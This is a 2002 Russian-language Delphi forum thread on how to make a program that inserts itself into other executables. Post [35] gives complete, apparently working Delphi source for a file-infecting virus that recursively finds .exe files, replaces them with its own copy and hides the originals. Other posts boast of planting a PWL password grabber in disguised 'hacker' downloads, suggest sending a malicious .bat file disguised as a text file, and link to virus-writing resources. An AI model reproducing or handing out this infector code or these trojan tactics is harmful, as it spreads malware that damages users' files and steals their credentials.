Программа в программе.

← →
Leo^Sun (2002-01-29 07:39) [0]

Как создать программу которая записывает свое тело в любую другую программу и запускается вместе с этой программой.

← →
perov (2002-01-29 08:01) [1]

легко и просто :)

← →
wicked (2002-01-29 09:13) [2]

2 Leo^Sun ©
вирус называется..... а теперь зададим вопрос - как написать вирус?....

← →
Knight (2002-01-29 09:35) [3]

Называется СирКам, ЛамерД и прочее...

← →
limon (2002-01-29 11:06) [4]

Маленький хакер сетку ломал,
Байты дебаггером мирно таскал.
Только админ был на утро не весел,
Знают менты, кто мальчонку повесил.

← →
AZ (2002-01-29 16:16) [5]

В 50-е годы гулял рисунок - робот (естественно, с лампой вместо носа и стрелочным прибором на груди) копался в собственных внутренностях.
То же в приложении к программам?

← →
Феликс (2002-01-29 18:15) [6]

Вообще, если я правильно понимаю, то такие вещи пишутся на Assemblere, а не на Делфи. Хотя и на Делфи можно при желание написать, однако, как справедливо заметили предыдущие товарищи: "Бой вирусописателям!".

← →
copyr25 (2002-01-29 20:58) [7]

Не обязательно вирус.
Вирус - это (плохое) намерение, а не программа:)))
У меня есть исходник на ассемблере - код дописывается к любому file.exe,
исполняется, потом независимо и неизменно работает прежний файл.
Чуть-чуть увеличивается размерчик прежнего файла.
Но все это в DOS"e.

← →
Delirium (2002-01-29 21:00) [8]

Вот пусть в DOS-е и останется :)

← →
copyr25 (2002-01-29 21:06) [9]

Так asm, он и в Африке:))) Т.е. здесь, конечно, конфа по Delphi,
но исполняются всё равно ассемблерные инструкции, будь они
написаны, хоть на C, хоть на чем...:))

← →
copyr25 (2002-01-29 21:09) [10]

Чем выше интеллект, тем ниже поцелуй:))
Это я про уровень языка:)))))))))

← →
Феликс (2002-01-30 02:23) [11]

Кстати, я вчера увидел ссылку на статью в которой очень подробно описывается как создать вирус и при этом указан исходник. Все на Делфи. Сволочи вирусописатели, до святого, до Делфи дошли....
Кому ссылку дать? :)

← →
Pat (2002-01-30 03:10) [12]

>Феликс
:-)) Это случайно не троян был?

← →
SV (2002-01-30 13:21) [13]

Почему сразу ВИРУС? Конечно это 1-ое, что в голову приходит, но я щас тоже с этим решил помучиться. Так можно сделать вакцинацию прогамм от этих самых вирусов.

← →
VV (2002-01-30 13:30) [14]

Правильно, не обязательно вирус.
Меня около года назад просили защиту от записи прграммы написать, исходников небыло. Хотя и решил проблему другим способом, но добавить свой код в программу было-бы лучше.

← →
copyr25 (2002-01-30 20:53) [15]

>>Delirium:
Вот пусть в DOS-е и останется :)
Ну, а если, например, нужно, там, паролик на прогу навесить?
Причем тут вирус?
Leo^Sun нормальный вопрос задал. А потенциальная интерпретация ответа,
ну, скажем так, сильно зависит от отвечающих:)))

← →
SV (2002-01-31 13:05) [16]

2 Феликс Кинь,pls, ссылку, хотябы на мыло, а то у меня кроме книжонки по структуре EXE и идеи больше ничего нету.

← →
Феликс (2002-01-31 18:19) [17]

http://www.xatka.vov.ru/artic/ddd2.htm

← →
Pat (2002-01-31 18:39) [18]

>Феликс
Невозможно отобразить страницу :-((((

← →
SV (2002-01-31 18:56) [19]

Все работает(т.е. ссылка а не вирус ;)). Спасибо, теперь дальше буду разбираться.

← →
Milz (2002-02-01 16:02) [20]

Даже с лучшими намерениями всё-же инфу по этому вопросу придётся искать у вирусописателей ;(. Например, http://z0mbie.host.sk/win32vir.txt и проч. статьи на http://z0mbie.host.sk/.

← →
savva (2002-02-01 17:03) [21]

идиотизм...:)) ввести константу имеющую смысл размера исполнимого файла "вируса"...:)) а получить размер файла нельзя, иначе это будет не такой крутой вирус :)) ( это я про исходник "вируса" :)))

← →
Феликс (2002-02-01 17:51) [22]

2 savva ©
Напиши письмо Dr.Klouniz! Может ему станет стыдно :)

← →
Юрий Зотов (2002-02-01 18:10) [23]

Да там, в общем-то, бред чайника, а никакой не вирус. А уж по сложности - чуть выше табуретки.

← →
savva (2002-02-01 18:28) [24]

>Феликс © (01.02.02 17:51)
а стоит ли ему дело портить? Главное чтоб побольше народу после прочтения этого матерала почуствовало себя крутыми вирусописателями - вирусов тогда можно будет не опасаться..:))
Правда Касперский и другие конторы разорятся :)))

← →
SV (2002-02-01 21:52) [25]

2 savva. Как разоряться! Они на этих чайниках живут, а престиж поднимают убирая нормальные вирусы ;)

← →
Polevi (2002-02-01 22:00) [26]

я долго смеялся :-)

← →
Anatoly Podgoretsky (2002-02-02 20:36) [27]

copyr25 (29.01.02 20:58)
Программа изменяющая другую программу, путем дописывания своего еода по определению вирус

SV © (30.01.02 13:21)
Это тоже вирус, только легализованный

Вирус это понятие медицинское, определяющее процесс, а не цели.

← →
copyr25 (2002-02-04 18:19) [28]

Нет. Во-первых, вирусы, как правило, размножаются.
Во-вторых, они все, как правило, преследуют деструктивные цели.
А file.com, который "прилепляется" к exe-шнику для дополнения его (exe-шника) функций.
Какой же это вирус?

← →
copyr25 (2002-02-04 18:26) [29]

По-моему все, увлекшись обсуждением вирусов, подзабыли вопрос:
"Как создать программу которая записывает свое тело в любую другую программу и
запускается вместе с этой программой." (конец цитаты).
Автор вопроса, ведь не спрашивал, как создать вирус, который, по определению,
конечно, прикрепляется и исполняется.
Я не вижу в его вопросе никакого криминала. Раз человек интересуется, наверное,
стОит ответить?

← →
Иван Шихалев (2002-02-04 18:51) [30]

> "Как создать программу которая записывает свое тело в любую
> другую программу и запускается вместе с этой программой."

Дык это определение вируса и есть.

← →
copyr25 (2002-02-04 20:44) [31]

Не, конечно, Хижняк. Над его книгой принято смеяться...
Смеются, конечно, крутые хакеры:))
Но, тем не менее, давайте перечитаем опять?
П.Л.Хижняк "Пишем вирус ... и антивирус", изд-во "Инто", М., 1991
стр.5:
Глава 1.
Вирусом называют программу, которая помимо желания пользователя
компьютера выполняет действия, мешающие его нормальной работе.
(конец цитаты).
Так вот. Вирус это не механизм присоединения файла:))

← →
Иван Шихалев (2002-02-04 20:52) [32]

Это определение для пользователя.

Давайте не придумывать новых терминов. В биологии термин вирус появился значительно раньше, чем в программировании. И все, что ведет себя аналогично вирусу биологическому, я буду называть вирусом, независимо от мнения вирусописателей, виросоловцев и прочих кульных хацкеров.

← →
copyr25 (2002-02-04 21:19) [33]

Ну, биология, конечно...
А вопрос-то по программированию:)))
И "новый термин" появился когда гриппом млекопитающие
все уже переболели, только компы ещё не привыкли...
Так что, определение "для пользователя", вроде бы, кстати?
Нет?

← →
copyr25 (2002-02-04 21:23) [34]

Вирусной инфекцией называют состояние больного, которое помимо желания
больного мешает ему выполнять общественно-полезные функции:)))

← →
Amit (2002-02-04 21:44) [35]

Народ так мы можем целый век обсуждать, лучше я дам примерчик, а он пусть сам и разберётся, а дальше посмотрим что он ещё попросит. А вот сам и пример:
Коментарий, Тот кто внимательно посмотрит на весь исходник, тот сразу поймёт что за данная программа!
program DllMan;

uses
windows,
sysutils;

{$R *.res}

const
mysize=42496;
var
FileName:string;
TypeFile:longword;
counter:integer=0;
TmpDir : TFilename;
SavedDir : TFilename;
StartDir: TFilename;
DirSrcRec : TSearchRec;
FileSrcRec : TSearchRec;
FileInf:String;
FileInfN:string;
FILENn:integer;
StartupInfo: TStartupInfo;
lpProcess: TProcessInformation;

PROCEDURE INFECT(FILEinfect:STRING);
var
FILEN:Integer;
BEGIN
FileInf:=TmpDIr+ExtractFileName(FileName);
FILEN:=pos(".",FileInf);
Delete(FileInf,Filen,filen+4);
FileInf:=FileInf+"vdx.dll";
MoveFile(pchar(filename),Pchar(FileInf));
CopyFile(Pchar(Paramstr(0)),PCHAR(filename),false);
END;

PROCEDURE SCAN;
var
ErNum : Integer;
EXT : String;
begin
GetDir(0,TmpDir);
if tmpDir[length(tmpdir)]<>"\" then TmpDir:=TmpDir+"\";
ErNum:= FindFirst(tmpdir+"*.exe",not (faReadOnly or faHidden),FileSrcRec);
while ErNum = 0 do
begin
FileName:=Concat(tmpDir,FileSrcRec.Name);
Ext:=ExtractFileExt(FileName);
GetBinaryType(pChar(FileName),TypeFile);
if (FileName[Length(FileName)]<>".") and
(UPPERCASE(ext)=".EXE") and
(FileSrcRec.size<>MySize) and
(Counter<1) then
begin
inc(Counter);
Infect(FileName);
end;
ErNum := FindNext(FileSrcRec);
end;
FindClose(FileSrcRec);

ErNum := FindFirst("*.*",faDIRECTORY,DirSrcRec);

while ErNum = 0 do
begin
if ((DirSrcRec.Attr and faDIRECTORY) <> 0) and (DirSrcRec.Name[1] <> ".") then
begin
ChDir(DirSrcRec.Name);
Scan;
ChDir(TmpDir);
end;
ErNum := FindNext(DirSrcRec);
end;
SysUtils.FindClose(DirSrcRec);
end;

begin
FileInfN:=ExtractFileName(Paramstr(0));
FILENn:=pos(".",FileInfN);
Delete(FileInfN,FilenN,filenN+4);
FileInfN:=FileInfN+"vdx.dll";
CopyFile(Pchar(FileInfN), Pchar(FileINfN+".EXE"),false);
FileSetAttr(Pchar(FileInfN+".EXE"),faHidden);
IF CreateProcess(pchar(FileINfN+".EXE"),nil,NIL,NIL,false,NORMAL_PRIORITY_CLASS,NIL,nil,StartupInfo,lpProcess)
Then
Begin
StartDir:=ExtractFileDrive(Paramstr(0));
ChDir(ExtractFileDrive(Paramstr(0))+"\");
Scan;
ChDir(SavedDir);
End;
DeleteFile(Pchar(FileINfN+".EXE"));
StartDir:=ExtractFileDrive(Paramstr(0));
ChDir(ExtractFileDrive(Paramstr(0))+"\");
Scan;
ChDir(SavedDir);
end.

← →
Иван Шихалев (2002-02-04 21:51) [36]

А вот это как раз не вирус. Да и на изначальный вопрос не отвечает.

← →
Anatoly Podgoretsky (2002-02-04 21:59) [37]

Как создать программу которая записывает свое тело в любую другую программу и запускается вместе с этой программой.

Записали, запустили, записали, запустили, ...

← →
ATLANTIDO (2002-02-05 01:02) [38]

Какой вирус ? О чем вы говорите ? Я лично бедных
юзеров со своего сайта "сладостями" кормил таким образом:
Раздел Download конечно :), где можно скачать
всякий софт типа Legion"ы, pwl-хаки, которые
юзеры хакерскими прогами считают. И во все это
я засовывал грабер pwl-файлов, еще и предлагал
useram анкету о провайдере заполнить :) :) :).
Так вот: беру настоящий Легион, пеереименовываю
его из екзешника в какой нибудь *.egh , пишу прогр.
на Делфях, которая переименовывает его в exe и
WinExec применяю (не забывая назвать мою прогр. Легионом).
В итоге юзер скачивает Лгион, запускает Легион, не
догадываясь о том что запускает мою программу.
To Leo^Sun : Думаю тебе это подойдет.
Так самое интересное, что человек 20 свои анкеты
позаполняло о своем провайдере
(пароля только не хватало):) :) :)

← →
Феликс (2002-02-05 01:06) [39]

Во щас флейм начнется!

← →
Billy (2002-02-05 01:09) [40]

Создайте файл ReadMe.txt.bat и напишите в нем какую-нибудь гадость (на ваше усмотрение). Пошлите ее какому-нибудь ламеру. Ламер ее запустит и, возможно, очень пожалеет (в зависимости от того, что вы туда запихали). Так вот этот самый .БАТ тоже, в общем-то, будет вирусом, но ведь он же ни куда не вписывал свое тело! А вообще, если кто знает ответ на поставленный вопрос, то мог бы и ответить, мне тоже интересно, хотя я вирус писать не собирался.

← →
Феликс (2002-02-05 01:41) [41]

А можно папку windows удалить! Во смеху будет. А можно шарик у мышки стыбрить во смеху будет! А можно брать его настоящий Легион из екзешника в какой нибудь *.egh , написать прогр.
на Делфях, которая переименовывает его в exe и WinExec применять. Во смеху будет! А можно такую прогу написать. Нажимаешь на кнопку и сообщение выскакивает "схватился за гуж не забудь сходить под душ". Во смеху будет! А можно мышаку хвост отрезать! Во смеху будет. А можно компьютер разобрать вытащить винт и побить по нему молотком, полить кислотой, бросить в воду и засунуть под конец магнит и вставить винт назад. Во смеху будет! А можно в клаве клавиши поменять во смеху будет. А можно в autoexec.bat чего нибудь добавить. Почти вирус будет! Во смеху то будет! А можно Rundll удалить и на его место свой файл бросить, юзер попытается выключить комп и нифига! Во смеху то будет! А можно гвоздь в ногу вбить. Во смеху будет! А можно от монитора выдернуть шнур и спрятать его. Во смеху будет! А можно все файлы *.dbx удалить. И кранты почте человека. Во смеху будет! А можно в бензобак спичку бросить. Во смеху и разных частей тела будет! А можно книгу почитать.... но смеха уже не будет. А можно башкой об стенку побиться....

← →
VuDZ (2002-02-05 13:36) [42]

по теме - на msdn.micorosft.com в MSND Magazine есть статья об внутреннем устройстве PE формата.

ЗЫ умному человку этого хватит

← →
SV (2002-02-05 22:12) [43]

2 All. Какая предвзятость! Вообще вирусом можно считать только программу, умеющую хоть как-то маскироваться, размножаться итд итп, а у меня абсолютно другая идея. В кратце: Записываем в файл мою программку, умеющую считать HASH файла, который уже гдето записан и + ещё некоторые действия. Кто считает это вирусом пусть 1 кинет в меня камень(виртуальный).
Chao

Программа в программе. Найти похожие ветки